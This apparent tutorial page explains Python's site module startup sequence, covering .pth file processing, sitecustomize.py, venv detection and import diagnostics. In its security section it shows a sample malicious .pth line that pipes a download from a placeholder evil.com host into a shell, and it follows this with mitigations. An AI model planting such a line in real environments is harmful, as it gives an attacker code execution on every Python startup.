Python site Customization — Deep Dive

The site module’s startup sequence in detail

The site module’s main() function (called automatically unless -S is used) follows a precise sequence. Understanding each step helps debug import issues and configure Python deployments.

Step 1: Compute prefixes

The module determines two key directories:

  • sys.prefix — the installation prefix (e.g., /usr or the venv directory)
  • sys.exec_prefix — the prefix for platform-specific files (usually the same)

For virtual environments, site reads pyvenv.cfg to override these prefixes:

import sys
print(f"prefix: {sys.prefix}")
print(f"exec_prefix: {sys.exec_prefix}")
print(f"base_prefix: {sys.base_prefix}")  # Original prefix before venv

# In a venv, prefix != base_prefix
is_venv = sys.prefix != sys.base_prefix

Step 2: Build site-packages paths

Using the prefixes, site constructs the site-packages directories and calls addsitedir() for each:

import site

# The actual directories site added
print(site.getsitepackages())
# ['/usr/lib/python3.11/site-packages',
#  '/usr/lib/python3.11/dist-packages']  # Debian/Ubuntu add this

Step 3: Process .pth files

For each site directory, site scans for .pth files. The processing rules:

# Lines in .pth files are processed as follows:
# 1. Blank lines and lines starting with # are skipped
# 2. Lines starting with "import " are exec'd as Python code
# 3. All other lines are treated as directory paths to add to sys.path
#    (after os.path.normpath and checking they exist)

This is how setuptools bootstraps itself — through a .pth file:

# easy-install.pth (simplified)
./setuptools-68.0.0-py3.11.egg
import setuptools.bootstrap

And how coverage enables automatic startup:

# coverage.pth
import coverage; coverage.process_startup()

Building a production sitecustomize.py

A well-structured sitecustomize.py for a server deployment:

"""
sitecustomize.py — Global Python configuration for production servers.
Place in /usr/lib/python3.x/ or the venv's lib directory.
"""
import sys
import os

# 1. Configure warnings
import warnings
if os.environ.get("PYTHON_ENV") == "production":
    # Suppress deprecation warnings in production
    warnings.filterwarnings("ignore", category=DeprecationWarning)
else:
    # Show all warnings in development
    warnings.filterwarnings("default")

# 2. Set up automatic error reporting
def _setup_error_reporting():
    try:
        import sentry_sdk
        dsn = os.environ.get("SENTRY_DSN")
        if dsn:
            sentry_sdk.init(dsn=dsn, traces_sample_rate=0.1)
    except ImportError:
        pass

_setup_error_reporting()

# 3. Configure default encoding for legacy systems
if hasattr(sys, "setdefaultencoding"):
    pass  # Not available in production Python

# 4. Add custom CA certificates
cert_file = os.environ.get("CUSTOM_CA_BUNDLE")
if cert_file and os.path.exists(cert_file):
    os.environ.setdefault("REQUESTS_CA_BUNDLE", cert_file)
    os.environ.setdefault("SSL_CERT_FILE", cert_file)

# 5. Enable faulthandler for crash diagnostics
import faulthandler
if not faulthandler.is_enabled():
    faulthandler.enable()

The .pth file execution exploit and mitigation

Because .pth files can execute arbitrary Python code via import lines, they are a potential security concern. Any writable site-packages directory could be compromised:

# malicious.pth — would execute on every Python startup
import os; os.system("curl https://evil.com/payload | sh")

Mitigations:

  • Ensure site-packages directories are not world-writable
  • Audit .pth files in production: find /usr/lib/python3.* -name "*.pth" -exec cat {} \;
  • Use python -S for security-sensitive scripts to skip .pth processing
  • Python 3.13 introduced -P (safe path) which doesn’t add the current directory to sys.path

Virtual environment architecture

The pyvenv.cfg file is the key to how virtual environments work with site:

# pyvenv.cfg in a typical venv
home = /usr/bin
include-system-site-packages = false
version = 3.11.5
executable = /usr/bin/python3.11
command = /usr/bin/python3.11 -m venv /home/user/myproject/venv

The site module’s detection logic:

import os
import sys

def _detect_venv():
    """Simplified version of site's venv detection."""
    exe_dir = os.path.dirname(os.path.realpath(sys.executable))

    # Check for pyvenv.cfg in exe_dir or parent
    for candidate in [exe_dir, os.path.dirname(exe_dir)]:
        cfg = os.path.join(candidate, "pyvenv.cfg")
        if os.path.isfile(cfg):
            return cfg, candidate
    return None, None

When a venv is detected:

  1. sys.prefix and sys.exec_prefix are set to the venv directory
  2. The venv’s site-packages is used instead of the system one
  3. User site-packages is disabled
  4. include-system-site-packages controls whether the base installation’s packages are visible

Custom .pth file patterns

Auto-configuring development environments

# dev-setup.pth — place in site-packages
# Adds the project source to sys.path for editable installs
/home/user/projects/my-library/src
import my_library._dev_setup; my_library._dev_setup.configure()

Monkey-patching at startup

# In a .pth file: import _patches; _patches.apply()
# _patches.py:
def apply():
    """Apply compatibility patches before any application code runs."""
    import ssl
    # Work around broken system OpenSSL
    if hasattr(ssl, '_create_unverified_context'):
        pass  # Example: configure SSL defaults

Measuring site import overhead

The site module adds measurable startup overhead. Profile it:

# Time startup with and without site
python -c "pass"           # With site (normal)
python -S -c "pass"        # Without site

# Detailed import timing
python -X importtime -c "import site"

# On Python 3.11+, see all startup imports
python -X importtime -c "pass" 2>&1 | head -20

Typical overhead from site is 5–15ms on modern systems. For serverless environments (AWS Lambda, Google Cloud Functions) where cold start matters, this overhead adds up when combined with .pth file processing and sitecustomize.py.

The PYTHONSTARTUP file

Separate from sitecustomize.py, the PYTHONSTARTUP environment variable points to a file that runs only in interactive mode:

# ~/.pythonstartup
import readline
import rlcompleter
readline.parse_and_bind("tab: complete")

# Add common imports for convenience
from pathlib import Path
from pprint import pprint
from collections import Counter, defaultdict

This does not use the site module directly but is part of the broader startup customization ecosystem.

site.addsitedir() internals

This function is the core mechanism for adding directories and processing their .pth files:

import site

# Programmatically add a new site directory at runtime
site.addsitedir("/opt/custom-packages")
# This:
# 1. Adds the directory to sys.path
# 2. Scans for .pth files in that directory
# 3. Processes each .pth file (adding paths and running import lines)

One subtle behavior: addsitedir processes .pth files with sitedir set as the working context, so relative paths in .pth files are resolved relative to the site directory.

A systematic approach for when imports break:

import sys
import site

def diagnose_site():
    print("=== Site Diagnosis ===")
    print(f"Python: {sys.version}")
    print(f"Executable: {sys.executable}")
    print(f"Prefix: {sys.prefix}")
    print(f"Base prefix: {sys.base_prefix}")
    print(f"In venv: {sys.prefix != sys.base_prefix}")
    print(f"User site enabled: {site.ENABLE_USER_SITE}")
    print(f"User site dir: {site.getusersitepackages()}")
    print(f"\nSite packages:")
    for p in site.getsitepackages():
        exists = "(exists)" if __import__('os').path.exists(p) else "(MISSING)"
        print(f"  {p} {exists}")
    print(f"\nsys.path:")
    for p in sys.path:
        print(f"  {p}")

diagnose_site()

The one thing to remember: The site module’s power lies in its .pth file processing and sitecustomize.py hooks — together they form the mechanism that pip, setuptools, virtual environments, and production deployment tools all rely on to configure Python’s import system before your application starts.

pythonconfigurationstartup

See Also

  • Python Ast Module Code Analysis How Python's ast module reads your code like a grammar teacher diagrams sentences — turning source text into a tree you can inspect and change.
  • Python Dis Module Bytecode How Python's dis module lets you peek at the secret instructions your computer actually runs when it executes your Python code.
  • Python Gc Module Internals How Python's garbage collector automatically cleans up memory you are no longer using — like a tidy roommate for your program.
  • Python Importlib Custom Loaders How Python's importlib lets you teach Python to load code from anywhere — databases, zip files, the internet, or even generated on the fly.
  • Python Startup Optimization Why Python takes a moment to start and what you can do to make your scripts and tools launch faster.